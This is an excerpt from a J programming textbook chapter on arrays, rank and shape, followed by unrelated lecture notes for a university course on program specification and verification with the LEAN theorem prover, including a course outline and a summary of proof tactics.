J can also perform arithmetic on higher-dimensional objects. In this section, we introduce arrays as well as the concepts of rank and shape. Rank is synonymous with dimensionality; thus a two-dimensional array has rank two, and a three-dimensional array has rank three. Verbs have rank attributes which are used to determine at what rank level they should operate on data objects. We will explore this later.
First, let us consider how we can define array objects using the dyadic shape verb $ :

```
   ] x2 =: 2 3 $ i.6
0 1 2
3 4 5
```

As we have already seen, we could have defined this particular array simply by:

```
   i. 2 3
0 1 2
3 4 5
```

This is fine for defining an array with ascending integers (as returned by i.), but if we wanted to form an array from some arbitrary list of values, then we need to use $. We will continue to use the $ method, although we acknowledge that it is not necessary, as the data objects used in these examples are merely ascending integers. The shape is specified by the left argument of $ and can be confirmed using $ in its monadic form:

```
   $ x2
2 3
```

The data object x2 is a \( 2 \times 3 \) two-dimensional array, or, in J terms, a rank two object (of shape 2 3). Arithmetic can be applied in the usual way. This example shows the product of a scalar and an array:

```
   2 * x2
0 2  4
6 8 10
```

Here we have the addition of two arrays (of the same shape):

```
   x2 + (2 3 $ 1 2 3 4 5 6)
1 3  5
7 9 11
```

J can handle this:

```
   2 3 + x2
2 3 4
6 7 8
```

But apparently not this:

```
   1 2 3 + x2
|length error
|   1 2 3    +x2
```

J, of course, can handle this, but we need to understand more about the rank control conjunction " (double quote), which will be covered in Section 3.1 below.

Consider a \( 2 \times 2 \times 3 \) array x3, built as 2 2 3 $ i.12: x3 is a three-dimensional array and, therefore, of rank three. J displays this array arranged into two planes of two rows and three columns, where the planes are delimited by a blank line. We can confirm the structure of x3 by using $ as a monad, where it performs a shape-of function:

```
   $ x3
2 2 3
```

Now, let us apply summation to x3:

```
   +/ x3
 6  8 10
12 14 16
```

Here, the individual elements of the two planes have been summed; that is:

\[
\begin{bmatrix} 0 & 1 & 2 \\ 3 & 4 & 5 \end{bmatrix}
+
\begin{bmatrix} 6 & 7 & 8 \\ 9 & 10 & 11 \end{bmatrix}
=
\begin{bmatrix} 0 + 6 & 1 + 7 & 2 + 8 \\ 3 + 9 & 4 + 10 & 5 + 11 \end{bmatrix}
=
\begin{bmatrix} 6 & 8 & 10 \\ 12 & 14 & 16 \end{bmatrix}
\]

It is important to understand why +/ sums across the planes rather than down the columns or along the rows. First consider this example:

```
   % x3
_ 1 0.5
0.333333 0.25 0.2

0.166667 0.142857 0.125
0.111111 0.1 0.0909091
```

Aside from the difference between the arithmetic operations that +/ and % perform, they also operate on the argument in a different way. Whereas +/ operated on the two planes, here % is applied to each individual scalar element. The difference in the behaviour of the two verbs +/ and % is governed by their respective rank attributes. We can query the rank attributes of verbs with the expressions below:

```
   % b. 0
0 0 0
   +/ b. 0
_ _ _
```

Three numbers are returned. The first number (reading left to right) is the rank of the monadic form of the verb. The second and third numbers are the ranks of the left and right arguments of the dyadic form of the verb. When a verb performs an operation on an object, it determines the rank of the cell elements on which it will operate. It does this by using either the rank (dimension) of the object or the rank attribute of the verb, whichever is smaller.
In the example above, x3 has a rank of three, and the (monadic) rank attribute of % is zero. So % is applied to x3 at rank zero; thus it is applied to each 0-cell (scalar) element. However, the rank attribute of +/ is infinite, and therefore the rank at which the summation is performed is three. Thus +/ applies at the level of the 3-cell of x3, resulting in a summation across the planes.

Consider another example. We define the data object x0 as a list of six elements and then apply the fork ($;#), which (simultaneously) returns the shape and the number of elements:

```
   ] x0 =: i.6
0 1 2 3 4 5
   ($;#) x0
+-+-+
|6|6|
+-+-+
```

Here both $ and # return six, as x0 consists of six atoms, or 0-cell elements. Now try this on x2, which was declared earlier:

```
   ($;#) x2
+---+-+
|2 3|2|
+---+-+
```

The resultant shape is as expected, but the number of elements returned by *tally* may not be. To make sense of the result, we need to know what "elements" the *tally* is counting: 0-cells, 1-cells or 2-cells? This depends upon the rank at which # is operating. The data object x2 is clearly rank two. The command line below shows us that the (monadic) rank attribute of # is infinite:

```
   # b. 0        NB. monadic rank attribute is infinite
_ 1 _
```

In this particular case we may ignore the dyadic rank attributes. Tally (#) is therefore applied to the whole 2-cell and counts its items, which are the rows. Consider this example:

```
   ] x1 =: 1 6 $ i.6
0 1 2 3 4 5
   ($;#) x1
+---+-+
|1 6|1|
+---+-+
```

Data objects x0 and x1 may appear the same, but they are actually different by virtue of their shape and rank. x1 is a \( 1 \times 6 \) two-dimensional array and, therefore, of rank two (with shape 1 6). It also has only one element (one row) because # still operates on the 2-cell. In contrast, x0 is a list of six 0-cell elements. In actual fact, x0 is equivalent to y0, defined below:

```j
   ] y0 =: 6 $ i.6
0 1 2 3 4 5
```

y0 and x0 are equivalent:

```j
   x0 = y0        NB. x0 and y0 are equivalent
1 1 1 1 1 1
```

x0 and x1, as we know, are not:

```j
   x0 = x1
|length error
|   x0    =x1
```

The difference between x0 and x1 becomes more apparent when we perform some arithmetic operation on them:

```j
   x1 - x0
|length error
|   x1    -x0
```

The interpreter is trying to subtract the first element of x0 from the first element of x1, then the second element of x0 from the second element of x1, and so on. However, while x0 has six 0-cell elements, x1 has only one item: its single row. Still, it does not seem unreasonable to want to perform arithmetic operations on x0 and x1, as they both contain six numbers. We can control the rank attribute of a verb, thereby enabling us to perform arithmetic on both x0 and x1. We will return to this example in Chapter 3 when we cover conjunctions.

### 2.7 Summary

In this chapter we have introduced some of the basic concepts of programming in J. J functions are called verbs. The primitive verbs are (mostly) designated by a single punctuation character (+) or a pair of punctuation characters (+:), though a few use alphabetic characters (i.). Verbs can be monadic (one argument) or dyadic (two arguments). Data objects have the properties of rank (dimension) and shape. All objects can be thought of as arrays. Atoms (0-cells), lists (1-cells) and tables (2-cells) are merely special instances of arrays ranked (dimensioned) zero, one and two, respectively.
Furthermore, any array of rank \( n \) can be thought of as a list of \( (n-1) \)-cell objects. Note that an atom has an empty shape and is different from a one-item list. Likewise, a list is different from a \( 1 \times n \) table. Verbs have rank attributes that determine at what cell level they operate.

Network Performance Analysis Using the J Programming Language
Holt, A.
2008, XVI, 216 p., Hardcover
ISBN: 978-1-84628-822-7
{"Source-Url": "https://www.springer.com/cda/content/document/cda_downloaddocument/9781846288227-c2.pdf?SGWID=0-0-45-452105-p173721714", "len_cl100k_base": 6966, "olmocr-version": "0.1.53", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 31186, "total-output-tokens": 7916, "length": "2e12", "weborganizer": {"__label__adult": 0.0002467632293701172, "__label__art_design": 0.0002951622009277344, "__label__crime_law": 0.0002472400665283203, "__label__education_jobs": 0.001331329345703125, "__label__entertainment": 7.748603820800781e-05, "__label__fashion_beauty": 0.00010192394256591796, "__label__finance_business": 0.0002148151397705078, "__label__food_dining": 0.0003426074981689453, "__label__games": 0.00041103363037109375, "__label__hardware": 0.00092315673828125, "__label__health": 0.0003893375396728515, "__label__history": 0.00021851062774658203, "__label__home_hobbies": 0.00012034177780151369, "__label__industrial": 0.00046753883361816406, "__label__literature": 0.0003266334533691406, "__label__politics": 0.00020563602447509768, "__label__religion": 0.00041294097900390625, "__label__science_tech": 0.054534912109375, "__label__social_life": 0.00010985136032104492, "__label__software": 0.016021728515625, "__label__software_dev": 0.92236328125, "__label__sports_fitness": 0.00022161006927490232, "__label__transportation": 0.0004148483276367187, "__label__travel": 0.00016629695892333984}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21397, 0.15966]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21397, 0.23601]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21397, 0.81782]], "google_gemma-3-12b-it_contains_pii": [[0, 1204, false], [1204, 2134, null], [2134, 3385, null], [3385, 5017, null], [5017, 6948, null], [6948, 7955, null], [7955, 9328, null], [9328, 10992, null], [10992, 12572, null], [12572, 14060, null], [14060, 15552, null], [15552, 16962, null], [16962, 18989, null], [18989, 21274, null], [21274, 21397, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1204, true], [1204, 2134, null], [2134, 3385, null], [3385, 5017, null], [5017, 6948, null], [6948, 7955, null], [7955, 9328, null], [9328, 10992, null], [10992, 12572, null], [12572, 14060, null], [14060, 15552, null], [15552, 16962, null], [16962, 18989, null], [18989, 21274, null], [21274, 21397, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, true], [5000, 21397, null]], "pdf_page_numbers": [[0, 1204, 1], [1204, 2134, 2], [2134, 3385, 3], [3385, 5017, 4], [5017, 6948, 5], [6948, 7955, 6], [7955, 9328, 7], [9328, 10992, 8], [10992, 12572, 9], [12572, 14060, 
10], [14060, 15552, 11], [15552, 16962, 12], [16962, 18989, 13], [18989, 21274, 14], [21274, 21397, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21397, 0.03191]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
a522295649ebe7d31c198252d357df0525963ff1
1 Software

Our modern societies heavily depend on software, and this dependence is likely to grow. Software is important, and it is also beautifully complex. It is complex first because of its sheer size: estimates place Google's software at about 2 billion lines of code, and Microsoft's Windows operating system at about 50 million lines of code\(^1\); a pacemaker has about 100 thousand lines of code, the Boeing 787 airplane has more than 10 million, and a modern high-end car has about 100 million\(^2\); some estimates place the size of new software produced every year at hundreds of billions of lines of code\(^3\).

But even very small programs can be extremely complex. The famous Collatz conjecture states that the following program terminates for all possible inputs:

\[
\begin{aligned}
& n := \text{input a natural number}; \\
& \text{while } (n > 1) \\
& \quad \text{if } (n \text{ is even}) \\
& \quad \quad n := n/2; \\
& \quad \text{else} \\
& \quad \quad n := 3n + 1;
\end{aligned}
\]

The Collatz conjecture is an open problem in mathematics.\(^4\) It is a conjecture (i.e., something we believe is true), but not a theorem (i.e., not something we have proven). The fact that this 6-line program defies the understanding of our best mathematicians tells us that there is something inherently complex and challenging about software. Software is the most complex artifact that humans have ever constructed. Understanding software is an important intellectual challenge for humanity.

2 Software Science

Science is knowledge that helps us make predictions. The key word is predictions. The stronger the science, the stronger the predictions it can make. Software science helps us make predictions about the programs that we write. Will my program terminate? Is my program correct? What does correct even mean? Will my program produce a correct output? When exactly is an output correct? Should the input satisfy any conditions in order for the output to be correct? Etc.

\(^1\) According to \url{https://www.wired.com/2015/09/google-2-billion-lines-code-and-one-place/}.
\(^2\) According to \url{https://www.visualcapitalist.com/millions-lines-of-code/}.
\(^3\) According to \url{https://cybersecurityventures.com/application-security-report-2017/}.
\(^4\) If you solve it, you will become famous. See also: \url{https://www.quantamagazine.org/can-computers-solve-the-collatz-conjecture-20200826/} (thanks to Samuel Lowe for suggesting this article).

3 This Course

**Testing and proving:** This course is an introduction to the science of software. You have already written programs. You have taken and will take more courses that teach you how to program. In most programming courses you will focus on checking program correctness by testing. Testing is very important, but as Dijkstra famously said: “Program testing can be used to show the presence of bugs, but never to show their absence!” In this course we focus on proving program correctness. Proving is a stronger guarantee than testing. Testing checks only some inputs, whereas a proof is usually about all possible inputs. So proofs offer stronger predictions about our programs.

**Logic:** But in order to prove that a program is correct, we must first define what exactly we mean by correct. For that, we will use logic. Logic is first of all a language. Contrary to natural languages (English, Greek, etc.), logic is precise and unambiguous. We can debate endlessly about the meaning of love and politics, but the meaning of a logical formula is not a matter of opinion.
It is mathematically defined. This is very important because it helps avoid errors of communication. Miscommunication can be catastrophic in love and politics, but also in engineering projects.

**Specification and verification:** In this course we will use logic for several things.\(^5\) We will use logic to express properties of programs. Collectively these properties define what it means for a program to be correct: they specify the program. This is called program specification. We will also use the rules of logic to prove those properties. Proving that a program satisfies its specification is called program verification.

**In this course we will learn:**

- to read functional programs with types
- to write functional programs with types
- to read formal specifications written in logic
- to write formal specifications in logic
- to read proofs
- to write proofs.

**LEAN:** This semester, we will use the LEAN theorem prover: [https://leanprover.github.io/](https://leanprover.github.io/). We will write programs in LEAN’s programming language, we will write specifications in LEAN’s logic, and we will write proofs using LEAN’s proof system. Install LEAN on your personal computer as soon as you read this:

**IMPORTANT: YOU SHOULD INSTALL LEAN 3, NOT LEAN 4!!!**

We found the instructions provided here most helpful: [https://leanprover-community.github.io/](https://leanprover-community.github.io/).

**Other theorem provers:** The goal of this course is *not* to teach you LEAN. The goal is to introduce you to the science of software, formal logic, formal specification, and formal verification. We are using LEAN as a tool and as a means to an end, rather than the end itself. LEAN is just one of many tools that could be used for this purpose. Examples of other such tools are (in alphabetical order):

- ACL2s: [http://acl2s.ccs.neu.edu/](http://acl2s.ccs.neu.edu/)
- Agda: https://wiki.portal.chalmers.se/agda/
- Coq: https://coq.inria.fr/
- Idris: https://www.idris-lang.org/
- Isabelle: https://isabelle.in.tum.de/
- PVS: https://pvs.csl.sri.com/

The above list is by no means exhaustive. This is an active area of research, and new tools are being developed or new capabilities are added to existing tools all the time. Each tool has its own pros and cons, just like different programming languages and systems have their own pros and cons. Nevertheless, some basic concepts and principles are common to all these tools. It is these concepts and principles that we strive to teach you in this course, and it is these concepts and principles that you should strive to learn.

**Having fun with proofs:** Proving theorems with a tool like LEAN is a lot of fun. It’s like playing a game. The goal of the game is to prove the theorem. This is like solving a puzzle, or finding our way out of a maze. We will learn which moves to make to help us find the exit of the maze. **WARNING:** this game can become addictive!

**How to succeed in this course:** You learn by experimenting, asking questions, and making mistakes. Making mistakes is great (as long as they are not catastrophic mistakes, like drinking and driving and car crashing). Fortunately, computer science provides you with a very safe environment for making mistakes: the worst that can happen is that your program doesn’t compile, or that it doesn’t return the right result. Big deal.

---

\(^5\) Logic goes far beyond what we will see in this course. Logic is the foundation of mathematics. It is also the foundation of language, reason, and philosophy.
In this course, what can go wrong? Maybe LEAN does not accept your function definition and you don’t see why. Or maybe your function doesn’t work as expected. Or you cannot complete a proof. Etc. Try to experiment to see what goes wrong. For LEAN-specific things, consult the LEAN documentation. Ask questions when you are deadlocked. **There are no stupid questions.**

A good way to know whether you are learning what you are supposed to be learning is whether you are **able to do all the homework problems by yourself.** If you are, you will do well in the course. If you are not, you should be worried. Come to our office hours if you are worried.

4 **These Lecture Notes**

These lecture notes will be sparse. This is intentional. Their aim is not to be a comprehensive textbook, but rather to guide you in the course (like a map). The philosophy of the course is **learning by doing.** Is there any other way to learn, really? In particular, these lecture notes are **not** about learning LEAN. There are many, many good resources on LEAN freely available online: examples, tutorials, online textbooks, and many more. References to those will be provided as the course progresses.

These lecture notes will be permanently under construction. They will be updated regularly as we advance in the course. The latest version will serve as the reference point. Please look at the date of these notes, compare it to the date in your own copy, and use the latest version.

5 **Other Reading**

**Documentation on LEAN:** There is a lot of documentation available on LEAN from the following web sites:

- https://leanprover.github.io/
- https://leanprover-community.github.io/

Unfortunately, there is no single document that matches exactly what we present in this course, so you will have to collect information from multiple sources. Also, much of the LEAN documentation is under construction and/or incomplete. We recommend starting with the link below (although it covers a lot that we will not cover or emphasize in this course, such as type theory and dependent types):

- [https://leanprover.github.io/theorem_proving_in_lean](https://leanprover.github.io/theorem_proving_in_lean)

You can also consult the reference manual (unfortunately the programming part is missing):

- [https://leanprover.github.io/reference/](https://leanprover.github.io/reference/)

You can also look directly at the LEAN code, libraries, etc.:

- [https://github.com/leanprover/lean/tree/master/library/init](https://github.com/leanprover/lean/tree/master/library/init)

For those interested in using LEAN for formal mathematics, here’s a couple of links:

- The Future of Mathematics? talk by Kevin Buzzard: [https://www.youtube.com/watch?v=Dp-mQ3HxgDE](https://www.youtube.com/watch?v=Dp-mQ3HxgDE) (thanks to William Schultz for suggesting this link).

**Type Theory:** LEAN is based on so-called *type theory*, which studies *type systems*. LEAN has a type system, and many (typed) programming languages also have type systems. Type systems are fundamental in programming (languages), but also in logic and the foundations of mathematics. However, we will not study type systems or type theory in this class, as our main focus is to learn how to do proofs by doing. Those interested in type theory can consult the references below:

- *Types and Programming Languages* by Benjamin C. Pierce.
- *Advanced Topics in Types and Programming Languages* by Benjamin C. Pierce, editor.
- A short introduction to LEAN’s type system can be found here: [https://leanprover.github.io/theorem_proving_in_lean/dependent_type_theory.html](https://leanprover.github.io/theorem_proving_in_lean/dependent_type_theory.html).

as well as relevant courses in programming languages.

**Software Foundations:** [https://softwarefoundations.cis.upenn.edu/](https://softwarefoundations.cis.upenn.edu/). *Software Foundations* is a book series available online. It goes much further than we do in this course, but its first part (Volume 1) serves as good reading material for this course. *Software Foundations* uses a different theorem prover, called Coq. LEAN is quite similar to Coq, and you should be able to follow and re-do most of the things described in *Software Foundations* in LEAN. We often borrow exercises from *Software Foundations* and adapt them to our course. We thank the authors of *Software Foundations* for making the series freely available.

---

This is also what you will have to do in your “real life” outside the university.

**Other Courses:** In addition to the *Software Foundations* online series, there are a number of courses available online which are related to our course. Here’s a partial list for those interested:

- *Logic and Proof* at CMU: [https://leanprover.github.io/logic_and_proof/](https://leanprover.github.io/logic_and_proof/). This course is also based on LEAN.
- *Logical Verification* at Vrije Universiteit Amsterdam: https://lean-forward.github.io/logical-verification/2020/. This course is also based on LEAN.
- *Semantics of Programming Languages* at TU Munich: http://www21.in.tum.de/teaching/semantik/ws1920/. This course is based on another theorem prover, called Isabelle.
- *Formal Reasoning About Programs* at MIT: http://adam.chlipala.net/frac/. This course is based on Coq.

A formal methods course database is available here: https://fme-teaching.github.io/courses/

There are also regularly held summer schools and other seminars on logic and related formal techniques:

- See the Speaking Logic material by Natarajan Shankar (http://fm.csl.sri.com/ssft21/speaklogicv10.pdf), part of the Summer School on Formal Techniques: http://fm.csl.sri.com/ssft21/.
- See the list here: http://user.it.uu.se/~bengt/info/summer-schools.shtml.

**Textbooks:** There is no required textbook for this course. For those interested in learning more about logic and its use in computer science in general, and specification/verification in particular, here are some textbooks:

- *Logic in Computer Science: Modelling and Reasoning about Systems*, by Huth and Ryan [10].
- *Handbook of Practical Logic and Automated Reasoning*, by Harrison [7].
- *The Calculus of Computation - Decision Procedures with Applications to Verification*, by Bradley and Manna [3].

For those interested in learning more about verification and formal methods:

- *Model Checking*, by Clarke, Grumberg and Peled [4].
- *Principles of Model Checking*, by Baier and Katoen [1].
- Several books on the SPIN model checker by Holzmann [8, 9].
- Books by Manna and Pnueli: *The Temporal Logic of Reactive and Concurrent Systems: Specification*, *Temporal Verification of Reactive Systems: Safety*, and *Temporal Verification of Reactive Systems: Progress* (the third is available online as an unpublished draft) [12, 13].
- *Handbook of Model Checking*, by Clarke, Henzinger, Veith, Bloem [5].

Other relevant books are the following:

- *Coq’Art* by Bertot and Castéran [2].
- *Certified Programming with Dependent Types* by Adam Chlipala. Available at http://adam.chlipala.net/cpdt/.
- *Formal Reasoning About Programs* by Adam Chlipala. Available at http://adam.chlipala.net/frac/.
- *Isabelle/HOL – A Proof Assistant for Higher-Order Logic* by Nipkow et al. [14].
- *Concrete Semantics with Isabelle/HOL* by Nipkow and Klein.
- *Functional Algorithms, Verified!* by Nipkow et al.

**The history of logic, in comics:** *Logicomix*, co-authored by famous computer scientist Christos Papadimitriou, is a wonderful book on the history of logic and the foundations of mathematics.

6 Course Outline

To be populated as we go along.

6.1 Introduction (Lectures 1 and 2)

- Course goals and logistics.
- Introductions.
- A glimpse into LEAN and other theorem provers (Coq, Isabelle, ACL2s).

6.2 Functional Programming with Types in LEAN (Lectures 3 - 6)

Programming in a functional language with types.

- Basic expressions, predefined operations and types in LEAN.
- `#eval`, `#reduce`, `#check`, `#print`
- Defining simple non-recursive functions in LEAN.
- Strong typing, type errors, and function types as input-output contracts.
- Predefined types `bool`, `nat`, `int` and `list nat`.
- Defining functions using pattern-matching.
- Recursive functions on `nat` and `list nat`, and a word about termination.
- Anonymous functions (lambda abstraction).
- Booleans and functions on booleans.
- Product types and currying.

6.3 Testing as Proving (Lectures 6 - 7)

Writing tests as “mini-theorems” using `example`.

- Introduction to proofs.
- The LEAN proof environment.
- The proof state, goals, and hypotheses.
- The `reflexivity` tactic.
- Tests = simple proofs.

6.4 Introduction to Specifications (Lecture 7)

- The type Prop.
- Properties and specifications.
- Informal and formal specifications.
- example, lemma, theorem.
- sorry.

6.5 Defining new types (Lectures 7 - 8)

- Defining our own types.
- Constructors.
- Enumerative types: the type weekday.
- Inductive data types.
- Defining the natural numbers: the type mynat.
- Defining recursive functions on inductive data types by pattern matching (data-driven definitions).
- Trees.
- Helper functions.

6.6 For-All Specifications (Lecture 9)

- Writing specifications with forall (∀).
- Formal specification and verification.
- Diving more into proofs.
- Proof tactics: intro.
- try.

6.7 Equational Reasoning and Introduction to Logic (Lectures 10 - 11)

- Equational reasoning.
- More forall specifications.
- Proof by cases.
- Introduction to logic: conjunction, disjunction, negation, implication.
- Proof tactics: intro (again, for implication), intros, dunfold, cases.

6.8 Review (Lectures 12 and 13)

- Where we stand.
- Definitions with overlapping cases.
- Weird LEAN behavior.
- Proof tactics: unfold, rewrite, simp, repeat.
- When a tactic “applies” to a proof state.
- Type coercions (are bad).
- Higher-order logic.
- Fermat’s last theorem.
- The dangers of if-then-else.

6.9 Logic (Lectures 12 - 19)

- Review of propositional (boolean) logic: syntax, semantics, truth tables, boolean functions, satisfiability, validity, ...
- How many boolean functions of arity n are there?
- Syntax vs semantics.
- bool vs Prop.
- Proving propositional logic tautologies in LEAN vs. by truth table.
- Negation.
- If-and-only-if (iff).
- Exclusive-OR (xor).
- Propositions as types, theorems as functions.
- Modus ponens.
- Using lemmas and theorems.
- Constructive vs. classical logic.
- The axioms classical.em (law of excluded middle) and classical.by_contradiction.
- Proof tactics: trivial, assumption, exact, left, right, cases (again, for conjunctive and disjunctive hypotheses), split, have.
6.10 Exam 1 – 28 Oct 2021

Taken online using Gradescope. Material: everything covered so far up to and including have (see above).

6.11 Induction and Functional Induction (Lectures 20 - 25)

- Proof by induction vs proof by cases.
- Multiple base cases.
- Multiple induction steps.
- Multiple induction hypotheses.
- Induction on nats, lists, trees, and other inductive data types.
- The induction tactic.
- Choosing the induction variable.
- Effect of induction on hypotheses.
- Discovering, writing, and using lemmas.
- Delaying introductions.
- The revert tactic.
- Notation: local notation.
- “Libraries”: import.
- Functional induction.
- The power of generalization.
- Induction schemes generated by functions.

6.12 Termination (Lectures 26 - 31)

- The hardness of proving theorems.
- The hardness of checking termination.
- Alan Turing.
- Undecidability.
- Proving termination.
- Measure functions.
- Persuading LEAN that a function terminates.
- Termination vs computational complexity.
- The Hydra game.
- Why program termination is important.
- Why non-termination is also useful.
- (Not really about termination) Dealing with tail-recursive functions.

7 Summary of Proof Tactics

Here’s a summary of the proof tactics that we have learned so far in this course:

1. **reflexivity**, abbreviated **refl**: applies when the goal is of the form \( A = A \), or can be easily simplified/reduced to \( A = A \). **Intuition/justification:** \( \forall A, A = A \) (“for all \( A \), \( A \) is equal to \( A \)”) is an axiom of logic, called reflexivity of equality. In practice, **refl** also applies to goals that are not strictly of the form \( A = A \), but can be reduced to that form after performing computations (reductions) on the left and/or right hand sides of the equation.

2. **intro**: applies when the goal is of the form \( \forall x : T, \ldots \); eliminates the \( \forall \)-quantified variable \( x \) from the goal and introduces \( x : T \) into the hypotheses. **Intuition/justification:** If I have to prove something like \( \forall x : T, P \), it suffices to prove \( P \) assuming \( x \) is an arbitrary element of type \( T \).

3. **intros**: repeatedly applies **intro**.

4. **repeat { ... }**: repeats the sequence of tactics within { ... } as many times as it can.

5. **unfold** and **dunfold**: simplify/reduce function applications of the form \( (f \, e) \) for a given \( f \). If we add `at H` at the end, then the tactic applies to hypothesis \( H \) instead of the goal. **Intuition/justification:** If I have to prove \( P \), and \( (f \, e) \) appears somewhere in \( P \), and \( (f \, e) = g \) for some \( g \), then it suffices to prove \( P \) where \( (f \, e) \) is replaced by \( g \).

6. **simp [H]**: simplifies the goal according to \( H \). \( H \) is optional: you can also just issue **simp**. Similar to **unfold**, but can simplify more. For instance, **simp** can simplify if-then-else statements, e.g., it simplifies \( \text{ite} \ (tt = tt) \ A \ B \) to \( A \). \( H \) could be a function, a hypothesis, or a previously proven lemma/theorem. We can also add multiple simplification rules, like: **simp [H1, H2, ...]**. If we add `at A` at the end, then the tactic applies to hypothesis \( A \) instead of the goal. **Intuition/justification:** Similar to that of **unfold/dunfold**.

7. **rewrite [←] H**: rewrites the goal based on the equality or equivalence \( H \).
\( H \) could be a function, a hypothesis, or a previously proven lemma/theorem. By default it rewrites from left to right. If ← is added, it rewrites from right to left. Abbreviated **rw**. If we add `at A` at the end, then the tactic applies to hypothesis \( A \) instead of the goal. **Intuition/justification:** If I rewrite based on a proven equality \( A = B \), then in order to prove goal \( G \) it suffices to prove \( G' \), which is obtained from \( G \) by substituting any occurrence of \( A \) with \( B \) (or vice versa, of \( B \) with \( A \), for **rewrite ←**). If I rewrite based on a proven equivalence \( G \Longleftrightarrow G' \), then I can replace goal \( G \) with \( G' \). If I rewrite function \( f \) and by definition of \( f \) I know that \( (f \, e) = g \), then the justification is similar to that of **unfold/dunfold**.

---

The phrase “replaced by \( g \)” is a bit simplistic, as the rules of substitution are not as trivial as they might seem at first glance. Luckily, we don’t have to worry about defining precisely what the rules of substitution are, or going over all their subtleties (free vs. bound variables, etc.), in this course. The reason is that LEAN is watching over us and performs substitutions correctly on our behalf.

8. **cases x**:

   - if \( x \) is an element of a certain data type such as `bool` or `nat`, splits a proof/goal into several subproofs/subgoals depending on the type of \( x \). **Intuition/justification:** If I have to prove \( P \) assuming that \( x \) is of some inductive data type \( T \), then it suffices to prove \( P \) for each of the possible objects that \( x \) could be, based on the constructors of \( T \).
   - if \( x \) is a hypothesis of the form \( P \lor Q \), splits a proof/goal into two subproofs/subgoals, one where \( P \) is assumed, and another where \( Q \) is assumed. **Intuition/justification:** If I have to prove \( G \) assuming that \( P \lor Q \) holds, then it suffices to prove \( G \) in each of the two cases: Case (1): \( P \) holds, and Case (2): \( Q \) holds.
   - if \( x \) is a hypothesis of the form \( P \land Q \), replaces \( x \) with two hypotheses, one stating that \( P \) holds, the other stating that \( Q \) holds. **Intuition/justification:** If I have to prove \( G \) assuming that \( P \land Q \) holds, then it suffices to prove \( G \) assuming that both \( P \) holds and \( Q \) holds.

   If we add `with ...` at the end, then we can rename the variables or labels in the various cases. Otherwise, LEAN picks the names for us.

9. **trivial**: discharges the goal when either the goal is `true` (or “obviously true”), or one of the hypotheses is `false` (or “obviously false”). **Intuition/justification:** \( H \to \text{true} \) trivially holds for any \( H \), and \( \text{false} \to G \) trivially holds for any \( G \).

10. **assumption**: discharges the goal when one of the hypotheses is identical to the goal. **Intuition/justification:** \( G \to G \) trivially holds for any \( G \).

11. **exact H**: discharges the goal when hypothesis \( H \) is identical to the goal. **Intuition/justification:** \( G \to G \) trivially holds for any \( G \).

12. **left**: when the goal is \( P \lor Q \), transforms the goal into \( P \). **Intuition/justification:** to prove \( P \lor Q \) it suffices to prove \( P \).

13. **right**: when the goal is \( P \lor Q \), transforms the goal into \( Q \). **Intuition/justification:** to prove \( P \lor Q \) it suffices to prove \( Q \).
14. **split**: when the goal is \( P \land Q \), splits the proof/goal into two subproofs/subgoals, one for \( P \) and one for \( Q \). **Intuition/justification:** to prove \( P \land Q \) it suffices to prove \( P \) and \( Q \) separately.

15. **have \( H : P := \ldots \)**: creates the new hypothesis \( H \) that \( P \) holds. We must then prove \( P \), by filling in the \( \ldots \) with a proof. **Intuition/justification:** to prove \( G \) from hypotheses \( H_1, H_2, \ldots \), it suffices to (1) prove a new goal \( P \) from hypotheses \( H_1, H_2, \ldots \), and then (2) prove \( G \) using the existing hypotheses \( H_1, H_2, \ldots \) plus the newly proved result \( H \) that \( P \) holds.

16. **induction x**: if \( x \) is an element of a certain inductive data type \( T \), perform induction on \( x \). Generates several proof obligations and the corresponding induction hypotheses depending on the constructors of \( T \). **Intuition/justification:** If I have to prove \( P \) assuming that \( x : T \), then it suffices to prove \( P \) for each of the possible objects that \( x \) could be, based on the constructors of \( T \). In doing so, I can assume that \( P \) holds for all previously/already constructed objects of type \( T \), in order to prove \( P \) for a newly constructed object of type \( T \). See also the comments in lecture code 20-code.lean.

17. **revert x**: if \( x : T \) is a variable of some data type \( T \) like `nat`, `bool`, etc., puts \( x \) back into the goal as \( \forall x, \ldots \); if \( x : P \) is a hypothesis of some proposition \( P \), puts \( P \) back into the goal as \( P \to \ldots \).

8 Allowed LEAN Library Axioms/Theorems

In your proofs, you are allowed to appeal to the following from the LEAN library:\(^8\)

```lean
#check and_comm
#check or_comm
#check or_false
#check false_or
#check or_true
#check true_or
#check and_true
#check true_and
#check and_false
#check false_and
```

```lean
#check band_ff
#check band_tt
#check bor_ff
#check bor_tt
#check ff_band
#check ff_bor
#check tt_band
#check tt_bor
```

In addition to the above results from the LEAN library, you are also allowed to use any result previously proven in class, including in lectures, labs, homeworks, etc. For instance, you are allowed to use anything in the given `ourlibrary24.lean` and all lecture and homework files uploaded on Canvas. You are also allowed to copy your own solutions from past homeworks, define your own helper functions, define and prove your own theorems and lemmas, etc.

References

\(^8\) If there is a result missing from the list that you think is reasonably basic and should be included, please let Stavros know.
